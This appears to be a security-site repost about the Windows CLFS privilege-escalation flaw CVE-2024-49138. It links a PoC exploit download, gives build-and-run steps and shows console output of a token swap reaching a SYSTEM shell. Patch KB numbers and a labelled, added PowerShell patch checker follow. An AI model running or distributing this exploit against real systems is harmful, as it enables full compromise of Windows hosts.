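CVE-2024-49138 overview
Elevation-of-privilege vulnerability in the Windows Common Log File System (CLFS) driver.
CrowdStrike detected threat actors actively exploiting this vulnerability.
CVE-2024-49138 PoC exploit download
CVE-2024-49138-POC.zip
Testing
Tested successfully on Windows 11 23H2.
Build and run
Build the x64 Release configuration.
Run it to obtain a SYSTEM shell.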
PS C:\Users\IEUser\Desktop> whoami
windows11\ieuser
PS C:\Users\IEUser\Desktop> .\CVE-2024-49138-POC.exe
Directory created successfully: C:\temp
Directory created successfully: C:\temp
file opened successfully
AddLogContainer successful
hResource = 0x00007FF7CDB89080
hResource = 0x00007FF7CDB890A0
pResourceData = 0x00007FF7CDB890A0
Resource size: 65536 bytes
Resource written to output.bin successfully.
Kernel Base Address: 0xFFFFF80339800000
Kernel Name: ntoskrnl.exe
NtReadVirtualMemory = 0x00007FFFAF0EFB40
NtWriteVirtualMemory = 0x00007FFFAF0EFAA0
pcclfscontainer = 0x0000000002100000
address_to_write = 0xFFFFC201424CC2B2
Process priority set to REALTIME_PRIORITY_CLASS.
Thread priority set to the highest level: TIME_CRITICAL.
triggering vuln...CreateLogFile failed with error 6601
Process priority set to NORMAL_PRIORITY_CLASS.
Thread priority set to the highest level: THREAD_PRIORITY_NORMAL.
vuln triggered
reading base of ntoskrnl to check we have arbitrary read/write
buf = 0x0000000300905A4D
swapping tokens...
current token address = 0xFFFFC201423EC578
systemtoken = 0xFFFFD401F501C6E9
Overwriting process token..
token swapped. Restoring PreviousMode and spawning system shell...
Microsoft Windows [Version 10.0.22631.2861]
(c) Microsoft Corporation. All rights reserved.
C:\Users\IEUser\Desktop>whoami
nt authority\system
C:\Users\IEUser\Desktop>
Affected products and patch download links
Release date | Affected product | Impact | Max severity | Article | Download | Build number |
| | | | 5048695 | Monthly Rollup | |
| | | | 5048676 | Security Only | |
| | | | 5048710 | Monthly Rollup | |
| | | | 5048744 | Security Only | |
| | | | 5048710 | Monthly Rollup | |
| | | | 5048744 | Security Only | |
| | | | 5048710 | Monthly Rollup | |
| | | | 5048744 | Security Only | |
| | | | 5048710 | Monthly Rollup | |
| | | | 5048744 | Security Only | |
| | | | 5048671 | Security Update | |
| | | | 5048671 | Security Update | |
| | | | 5048671 | Security Update | |
| | | | 5048671 | Security Update | |
| | | | 5048703 | Security Update | |
| | | | 5048703 | Security Update | |
| | | | 5048667 | Security Update | |
| | | | 5048794 | SecurityHotpatchUpdate | |
| | | | 5048667 | Security Update | |
| | | | 5048794 | SecurityHotpatchUpdate | |
| | | | 5048667 | Security Update | |
| | | | 5048794 | SecurityHotpatchUpdate | |
| | | | 5048653 | Security Update | |
| | | | 5048685 | Security Update | |
| | | | 5048685 | Security Update | |
| | | | 5048667 | Security Update | |
| | | | 5048794 | SecurityHotpatchUpdate | |
| | | | 5048652 | Security Update | |
| | | | 5048652 | Security Update | |
| | | | 5048652 | Security Update | |
| | | | 5048685 | Security Update | |
| | | | 5048685 | Security Update | |
| | | | 5048652 | Security Update | |
| | | | 5048652 | Security Update | |
| | | | 5048652 | Security Update | |
| | | | 5048654 | Security Update | |
| | | | 5048800 | SecurityHotpatchUpdate | |
| | | | 5048654 | Security Update | |
| | | | 5048800 | SecurityHotpatchUpdate | |
| | | | 5048661 | Security Update | |
| | | | 5048661 | Security Update | |
| | | | 5048661 | Security Update | |
| | | | 5048661 | Security Update | |
| | | | 5048735 | Monthly Rollup | |
| | | | 5048735 | Monthly Rollup | |
| | | | 5048699 | Monthly Rollup | |
| | | | 5048699 | Monthly Rollup | |
| | | | 5048695 | Monthly Rollup | |
| | | | 5048676 | Security Only | |
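To check hosts against the update list above, the following PowerShell is an added example, not part of the original post or the PoC. The function name Test-Cve202449138Patch and the 2024-12-10 release date are assumptions; the KB numbers are the unique values from the Article column. Because later cumulative updates supersede the listed ones, a host without a listed KB but with newer updates is reported as Review rather than Patched.

```powershell
# Added example (not from the original page). KB numbers are the unique
# values from the Article column of the table above.
$FixKbs = '5048652','5048653','5048654','5048661','5048667','5048671',
          '5048676','5048685','5048695','5048699','5048703','5048710',
          '5048735','5048744','5048794','5048800' | ForEach-Object { "KB$_" }

function Test-Cve202449138Patch {
    param(
        [string[]]$ComputerName = @($env:COMPUTERNAME),
        # Assumption, not stated on the page: the fixes were released with
        # the December 2024 security updates (2024-12-10).
        [datetime]$FixDate = '2024-12-10'
    )
    foreach ($computer in $ComputerName) {
        try {
            $installed = @(Get-HotFix -ComputerName $computer -ErrorAction Stop)
        } catch {
            [pscustomobject]@{ Computer = $computer; Status = 'Unreachable'
                               Evidence = $_.Exception.Message }
            continue
        }
        # Direct evidence: one of the listed updates is installed.
        $listed = @($installed | Where-Object { $FixKbs -contains $_.HotFixID })
        # Indirect evidence: some update was installed on or after the fix
        # date. It may be a superseding cumulative update or an unrelated
        # package, so it needs a manual look.
        $later = @($installed | Where-Object {
            $_.InstalledOn -and $_.InstalledOn -ge $FixDate })
        if ($listed.Count) {
            $status = 'Patched'; $evidence = $listed.HotFixID -join ','
        } elseif ($later.Count) {
            $status = 'Review'; $evidence = $later.HotFixID -join ','
        } else {
            $status = 'Missing'; $evidence = 'no listed KB, no update since fix date'
        }
        [pscustomobject]@{ Computer = $computer; Status = $status; Evidence = $evidence }
    }
}

# Check the local machine; pass -ComputerName for remote hosts.
Test-Cve202449138Patch | Format-Table -AutoSize
```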
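Notes
The safety of the file is unknown; run it in a virtual machine.
Originally published on the WeChat official account 云梦安全: CVE-2024-49138 PoC, Windows CLFS.sys privilege escalation vulnerability
Disclaimer: the programs (methods) discussed in this article may be offensive in nature and are provided for security research and teaching only. Readers who use this information for other purposes bear all legal and joint liability themselves; this site bears no legal or joint liability. If there is a problem, contact us by e-mail (a corporate or otherwise valid mailbox is recommended so that the message is not blocked; contact details are on the home page).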